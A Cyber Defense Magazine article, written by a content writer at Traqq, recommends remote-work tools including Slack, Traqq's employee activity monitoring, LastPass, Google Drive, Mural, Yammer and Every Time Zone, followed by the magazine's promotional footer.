It’s easy to lose proper communication while transitioning to a remote working structure. It’s one of the common issues companies face, and it can lead to a massive dip in productivity. For starters, workers can no longer talk to each other face to face as they used to. The ease of walking over to a teammate’s desk to ask questions and come up with solutions to a problem is no longer there. This can lead to a messy communications network where vital information gets lost. While email works in a scenario where all employees commute to a physical workplace, it’s less feasible with remote work. It’s difficult to hold continuous conversations over email, especially when you need to talk to many people about small issues at the same time. To create an effective workflow and boost productivity, you need a tool like Slack. This is an instant communication tool that comes with two primary modes of communication:

• Channel messages
• Direct messages

Using these two modes, employees can exchange solutions, creative ideas, and information seamlessly. In addition, it comes with add-ons that make it more efficient than email communication. Slack also features a video call tool that you can use when you want to have face-to-face conversations. This gives a feeling that’s close to what you get from talking to a colleague or employee in a physical office. It’s also useful for holding quick meetings. Everyone can simply sign in and enjoy the pleasure of seeing each other’s faces, smiles, and gestures. The app allows for file sharing, which makes it the perfect communication tool. Moreover, it can be integrated with other third-party team management software such as Jira and Google Calendar.

1. Tool to Prevent Time Theft: Traqq

Working from home is great. However, it can come with a problem of distraction. In an office, it’s easy to keep an eye on your employees, caution them, or help them do their tasks without procrastinating. However, when it comes to telecommuting, the story is different. You need to find a way to monitor staff without being the overbearing boss that everybody hates. This is where time management apps come in. Traqq is a time tracking software that allows you to keep tabs on employee activity, no matter where they are in the world. Research shows that individuals tend to work faster when they realize their activity is being monitored. This means that you can ensure an increase in productivity even without having your workers under one roof. For example, managers use Traqq to keep track of their staff’s on-screen activity. They can see which websites and apps an employee visits during work hours. In addition, they get reports on how much time a worker spent on those sites and what they were doing on the pages they opened. This time tracking tool helps you figure out how many minutes or hours each worker spends on particular tasks. At the end of every week or month, you get a detailed report that’ll help you give feedback and coaching to your employees. If a staff member is wasting time surfing through Instagram or playing games during their work time, you’ll know from the activity report that the time management app will generate.


Traqq also performs automatic tracking, which means that it quietly records user activity in the background without creating distractions or interfering with their daily work. It achieves this by taking screenshots or video recordings at intervals. The manager can then review this visual data and see an accurate calculation of the number of hours worked. This app has many features that help to keep employees focused. For instance, this tool measures each worker’s activity level based on keyboard movements and mouse clicks. Your staff will stay focused on tasks, knowing there’s a tool monitoring their activity during work hours. At the end of the workweek or month, the data is collated, and the app automatically gives you an extensive report. It shows the productivity level of each worker and provides accurate data for invoicing, salary payment, and client billing.

2. Tool to Prevent Data Leaks: LastPass

As an organization moves its business online, it has to incorporate a lot of digital tools into daily operations. Using various apps and services means having several accounts – this, in turn, means creating many passwords. It can get tedious to remember and protect all company passwords, especially when you have several employees under your wing. Writing them down somewhere can be risky as well – they can fall into the wrong hands. To operate an efficient and safe business, you need a way to keep these passwords secure while ensuring workers don’t get locked out of their accounts. LastPass protects your company data by giving every team member a single master login password. As for the passwords to the other numerous accounts, they’re securely stored in the LastPass tool and are loaded automatically whenever a login page requests them. The app is available on several platforms and is compatible with numerous devices. It was designed specifically for remote business purposes and to simplify the process of handling multiple work-from-home employees.

3. Tool to Prevent File Loss: Google Drive

We cannot overemphasize the importance of having a secure system for sharing files and collaborating on digital data. Transitioning your business to a remote working structure means you have to find an efficient platform to protect business-related sensitive information. Employees need to exchange lots of information to facilitate the work process and ensure that crucial documents are stored safely. Since they can no longer do this physically, the amount of digital data that needs to be exchanged online will significantly increase. A secure file-exchanging and project-collaboration network is necessary to avoid miscommunication and safeguard sensitive material from getting lost in transit. Sending large files through email can get messy because there’s no way to organize and collaborate with other team members in your inbox. Besides, it’s easy to miss an important message when they pour in from several sources simultaneously. Large organizations can easily invest in customized file sharing and collaboration tools. However, small businesses might not have the resources to pull it off.


Fortunately, Google came to the rescue with an app that small to medium-sized companies can use to share and store data. Google Drive is a cloud-based tool that your employees and teammates can use to collaborate on projects while keeping your data secure. No matter the worker’s location, they can share, download, edit, and leave comments on documents. The platform gives you 15GB of storage for free, which you can use to share any type of file: documents, images, videos, links, and spreadsheets. Since many people are already familiar with Google-based products, it’ll be easy to transition your workforce towards using other Google-based tools.

4. Tool to Prevent Mental Blocks: Mural

When in a physical office space, it’s easy to get creative ideas from interacting with other employees, having meeting sessions, and engaging in playful banter. Even a chance meeting in an elevator can send bursts of fresh ideas coursing through you. This is not so when working from home – you’re alone, and it can get stale and mentally dull pretty quickly. There are no brainstorming sessions or cooperative working events in your home office to get the inspiration flowing. In these situations, digital communication tools might not be so helpful – creativity and inspiration sometimes need spontaneity, which these apps don’t give. It can get monotonous scheduling calls and video conferences just to bounce ideas off each other. Mural is a digital tool designed specifically for this purpose – the app is like a canvas for ideas and spontaneous creative thoughts. Unlike most project sharing platforms, it gives you the freedom to share ideas in any form you want. Teammates and colleagues can put their thoughts on digital sticky notes, which they can arrange into diagrams, flow charts, and even drawings. Mural adds a new, fun way of staying organized and creative. It’s a great alternative to other, more traditional project management tools and is an amazing tool for boosting creativity among your workforce.

5. Tool to Prevent Feelings of Isolation: Yammer

Remote work can get lonely sometimes, especially when you’re living alone. We are social creatures, and we crave human-to-human communication. When making changes to take your business online, this is something to keep in mind. While there are many professional collaboration and communication tools with all the right features, these apps fail to cover the social aspects of cooperating on projects. To achieve team bonding, consistent communication and feedback between teammates are essential. One way to accomplish this in a traditional office space is through team-building outings and social events. However, this might not be possible when you have several employees in different and faraway locations. Yammer helps you with this. Commonly known as the “Facebook for business,” the app has the makings of a social media network. However, instead of focusing on random personal updates and gossip, the tool focuses on work-related project updates. Teammates can like, share, and comment on posts and updates made by colleagues on the projects they’re working on, just as they would on social media.


6. Tool to Prevent Inefficient Task Delegation: Every Time Zone

Running a remote business means dealing with employees in different time zones. This presents the challenge of not knowing who’s available at any given time, which can make handovers and task delegation difficult. Unfortunately, keeping track of everyone’s time zones can be exhausting, and colleagues may end up messaging or calling each other at odd hours. This can create more barriers to productive communication. Every Time Zone is an app that takes away the issue of performing calculations whenever you need to check who’s available for a task. It shows you the current time in every time zone that your employees or colleagues are working from. This makes it easier to know whom you can call or chat with when necessary. It may seem like a relatively small issue, but knowing who is available and at what time they’re reachable can help teammates delegate tasks more efficiently. Productive communication is necessary for building a successful remote business team.

Conclusion

Transitioning to a remote business structure doesn’t mean you have to sacrifice productivity and security. With the tools listed in this article, you can protect yourself and your employees from miscommunication, data hacking, and time theft. As a manager, solving these issues will give you time to focus on other crucial aspects of your business that require your attention, such as improving your products and services.

About the Author

Ikechukwu Nnabeze is a tech expert and content writer at Traqq whose goal is to improve people's lives with the help of modern technology. His interest in providing practical solutions to real-life tech problems has led him to a successful career in content creation. His passion is to help individuals and organizations from all over the world to embrace the life-changing beauty of modern technology. He enjoys poetry and stargazing when he’s not spending time with family. Ikechukwu can be reached online at [email protected] and at our company website https://traqq.com/


Meet Our Publisher: Gary S. Miliefsky, CISSP, fmDHS

“Amazing Keynote”

“Best Speaker on the Hacking Stage”

“Most Entertaining and Engaging”

Gary has been keynoting cyber security events throughout the year. He has also been a moderator and a panelist, and he has numerous upcoming events throughout the year.

If you are looking for a cybersecurity expert who can make the difference between a nice event and a stellar conference, look no further. Email [email protected]


You asked, and it’s finally here…we’ve launched CyberDefense.TV At least a dozen exceptional interviews rolling out each month starting this summer… Market leaders, innovators, CEO hot seat interviews and much more. A new division of Cyber Defense Media Group and sister to Cyber Defense Magazine.


FREE MONTHLY CYBER DEFENSE EMAGAZINE VIA EMAIL ENJOY OUR MONTHLY ELECTRONIC EDITIONS OF OUR MAGAZINES FOR FREE.

This magazine is by and for ethical information security professionals, with a twist on innovative consumer products and privacy issues on top of best practices for IT security and Regulatory Compliance. Our mission is to share cutting edge knowledge, real world stories and independent lab reviews on the best ideas, products and services in the information technology industry. Our monthly Cyber Defense e-Magazines will also keep you up to speed on what’s happening in the cyber-crime and cyber warfare arena, plus we’ll inform you as next generation and innovative technology vendors have news worthy of sharing with you – so enjoy. You get all of this for FREE, always, for our electronic editions. Click here to sign up today and within moments, you’ll receive your first email from us with an archive of our newsletters along with this month’s newsletter.

By signing up, you’ll always be in the loop with CDM.

Copyright (C) 2021, Cyber Defense Magazine, a division of CYBER DEFENSE MEDIA GROUP (STEVEN G. SAMUELS LLC. d/b/a) 276 Fifth Avenue, Suite 704, New York, NY 10001, Toll Free (USA): 1-833-844-9468 d/b/a CyberDefenseAwards.com, CyberDefenseMagazine.com, CyberDefenseNewswire.com, CyberDefenseProfessionals.com, CyberDefenseRadio.com and CyberDefenseTV.com, is a Limited Liability Corporation (LLC) originally incorporated in the United States of America. Our Tax ID (EIN) is: 45-4188465, Cyber Defense Magazine® is a registered trademark of Cyber Defense Media Group. EIN: 454-18-8465, DUNS# 078358935. All rights reserved worldwide. [email protected]

Copyright © 2021, Cyber Defense Magazine. All rights reserved. No part of this newsletter may be used or reproduced by any means, graphic, electronic, or mechanical, including photocopying, recording, taping or by any information storage retrieval system without the written permission of the publisher except in the case of brief quotations embodied in critical articles and reviews. Because of the dynamic nature of the Internet, any Web addresses or links contained in this newsletter may have changed since publication and may no longer be valid. The views expressed in this work are solely those of the author and do not necessarily reflect the views of the publisher, and the publisher hereby disclaims any responsibility for them.

Send us great content and we’ll post it in the magazine for free, subject to editorial approval and layout. Email us at [email protected]

Cyber Defense Magazine
276 Fifth Avenue, Suite 704, New York, NY 10001
EIN: 454-18-8465, DUNS# 078358935. All rights reserved worldwide.
[email protected]
www.cyberdefensemagazine.com

NEW YORK (US HQ), LONDON (UK/EU), HONG KONG (ASIA)

Cyber Defense Magazine - Cyber Defense eMagazine rev. date: 01/04/2021

Books by our Publisher: https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys-ebook/dp/B07KPNS9NH (with others coming soon...)


9 Years in The Making… Thank You to our Loyal Subscribers!

We've Completely Rebuilt CyberDefenseMagazine.com - Please Let Us Know What You Think. It's mobile and tablet friendly and superfast. We hope you like it. In addition, we're shooting for 7x24x365 uptime as we continue to scale with improved Web Application Firewalls, Content Delivery Networks (CDNs) around the Globe, Faster and More Secure DNS, and CyberDefenseMagazine.com up and running as an array of live mirror sites.

Millions of monthly readers and new platforms coming…starting with https://www.cyberdefenseprofessionals.com this month…
